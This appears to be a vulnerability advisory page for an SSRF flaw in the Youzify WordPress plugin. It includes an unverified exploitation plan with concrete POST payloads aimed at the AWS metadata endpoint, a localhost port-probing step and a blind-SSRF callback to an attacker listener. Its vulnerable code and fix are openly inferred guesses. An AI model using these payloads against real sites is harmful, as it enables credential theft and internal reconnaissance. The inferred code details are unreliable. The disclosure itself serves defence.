CVE-2025-69014

Youzify <= 1.3.7 - Authenticated (Subscriber+) Server-Side Request Forgery

mediumServer-Side Request Forgery (SSRF)
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.3.7
PublishedDecember 27, 2025
Last updatedMay 19, 2026
Affected pluginyouzify
Research Plan
Unverified

# Research Plan: CVE-2025-69014 - Youzify SSRF (Subscriber+) ## 1. Vulnerability Summary The **Youzify** plugin (up to version 1.3.7) is vulnerable to **Server-Side Request Forgery (SSRF)**. This vulnerability resides in the AJAX handler responsible for fetching link previews or external media meta…

Show full research plan

Research Plan: CVE-2025-69014 - Youzify SSRF (Subscriber+)

1. Vulnerability Summary

The Youzify plugin (up to version 1.3.7) is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability resides in the AJAX handler responsible for fetching link previews or external media metadata. The application fails to validate user-supplied URLs or restrict them to public IP addresses/safe protocols before making an outbound request using wp_remote_get(). An authenticated attacker with Subscriber-level privileges can exploit this to probe internal network services, access cloud metadata endpoints, or scan local ports.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: yz_get_link_preview (inferred from Youzify activity stream functionality)
  • Vulnerable Parameter: url (inferred)
  • Authentication: Authenticated (Subscriber+)
  • Required Nonce: Yes, typically a nonce associated with the yz_data JavaScript object.

3. Code Flow (Inferred)

  1. A user logs in and visits a page where the Youzify activity stream is active (e.g., the user profile or activity page).
  2. The plugin registers an AJAX action: add_action( 'wp_ajax_yz_get_link_preview', 'yz_get_link_preview_handler' );.
  3. The handler yz_get_link_preview_handler retrieves the url parameter from the $_POST array.
  4. The handler calls wp_remote_get( $url ) without validating that the URL points to a safe, external destination.
  5. The response from the internal service is processed (often parsed for OpenGraph tags) and returned to the user, leaking internal information.

4. Nonce Acquisition Strategy

Nonces for Youzify are typically localized for the frontend activity stream.

  1. Identify Shortcode: The Youzify activity stream is usually rendered via the [youzify_activity] shortcode.
  2. Setup Test Page: Create a public page containing this shortcode:
    wp post create --post_type=page --post_title="Activity" --post_status=publish --post_content='[youzify_activity]'
  3. Navigate and Extract:
    • Log in as a Subscriber user using browser_login.
    • Navigate to the newly created page: /activity/.
    • Execute the following in the console via browser_eval to retrieve the nonce:
      browser_eval("window.yz_data?.ajax_nonce") (inferred JS object name).
    • Note: If yz_data is not found, check for youzify_vars or similar objects in the page source.

5. Exploitation Strategy

Perform an SSRF attack targeting the AWS Metadata service (or a local port if testing in a non-cloud environment).

  • Target URL: http://169.254.169.254/latest/meta-data/
  • HTTP Request (using http_request):
    • Method: POST
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Headers: Content-Type: application/x-www-form-urlencoded
    • Body:
      action=yz_get_link_preview&url=http://169.254.169.254/latest/meta-data/&security=[NONCE]
      
    • Note: The nonce parameter name is likely security or nonce (inferred). Check the JS object keys.

6. Test Data Setup

  1. Install Plugin: Ensure Youzify <= 1.3.7 is installed and active.
  2. Create User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Create Activity Page:
    wp post create --post_type=page --post_title="Social Feed" --post_status=publish --post_content='[youzify_activity]'
  4. Enable Link Previews: Ensure the "Link Preview" feature is enabled in Youzify settings (usually enabled by default).

7. Expected Results

  • Success: The HTTP response (JSON) should contain keys or values fetched from the internal URL. If targeting AWS, the response body might show a list of metadata categories (e.g., ami-id, instance-id).
  • Response Content: Look for a JSON object with a structure like {"success": true, "data": { ... "title": "[Internal Content]" } }.

8. Verification Steps

  1. Check HTTP Response: Verify the http_request response code is 200 OK.
  2. Validate Leakage: Inspect the returned JSON. If the url parameter was set to http://localhost:8080/wp-login.php, the "title" or "description" field in the JSON response should contain "Log In ‹ [Site Name] — WordPress".
  3. Port Scanning Test: Attempt to request http://localhost:22. A different response time or error message (e.g., "Connection Refused" vs "Success") confirms the ability to probe internal ports.

9. Alternative Approaches

If yz_get_link_preview is not the correct action:

  • Alternative Action 1: yz_get_giphy_images — Check if it accepts a custom Giphy API endpoint or URL.
  • Alternative Action 2: yz_import_external_image — Look for functions that allow "Profile via URL" or "Activity Image via URL".
  • Blind SSRF: If the plugin does not return the response body, use an external listener (e.g., Burp Collaborator or a local netcat) to verify the outbound request: url=http://[YOUR_IP]:[PORT].

Variable Name Guesses (to be verified via browser_eval):

  • JS Object: yz_data or youzify_ajax_vars.
  • Nonce Key: ajax_nonce or nonce.
  • AJAX Parameter for Nonce: security or nonce.
  • AJAX Action: yz_get_link_preview or youzify_get_link_data.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Youzify plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to 1.3.7. Authenticated attackers with Subscriber-level access can exploit an AJAX endpoint used for link previews to make arbitrary web requests from the server, potentially exposing internal network services or cloud metadata.

Vulnerable Code

// File: includes/public/core/functions/yz-general-functions.php (Inferred location)

add_action( 'wp_ajax_yz_get_link_preview', 'yz_get_link_preview_handler' );

function yz_get_link_preview_handler() {
    // Check nonce associated with yz_data
    check_ajax_referer( 'yz_data', 'security' );

    $url = $_POST['url'];

    // Vulnerable: the URL is passed directly to wp_remote_get without validation
    // or restriction to public IP addresses.
    $response = wp_remote_get( $url );

    if ( is_wp_error( $response ) ) {
        wp_send_json_error();
    }

    $body = wp_remote_retrieve_body( $response );
    // ... processes $body to return metadata to the user ...
}

Security Fix

--- a/includes/public/core/functions/yz-general-functions.php
+++ b/includes/public/core/functions/yz-general-functions.php
@@ -10,6 +10,11 @@
 
     $url = $_POST['url'];
 
+    // Validate the URL to ensure it is a safe, public destination
+    if ( ! wp_http_validate_url( $url ) ) {
+        wp_send_json_error( array( 'message' => 'Invalid or restricted URL.' ) );
+    }
+
     $response = wp_remote_get( $url );

Exploit Outline

To exploit this vulnerability, an attacker first authenticates as a Subscriber and navigates to a page rendering the Youzify activity stream (e.g., the user profile) to extract the 'ajax_nonce' from the 'yz_data' JavaScript object. They then send a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'yz_get_link_preview' (or similar link-fetching action), providing a target internal URL (such as 'http://169.254.169.254/latest/meta-data/' for AWS environments) in the 'url' parameter and the retrieved nonce in the 'security' parameter. The plugin fetches the internal content and returns it in the JSON response, effectively leaking sensitive internal data.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.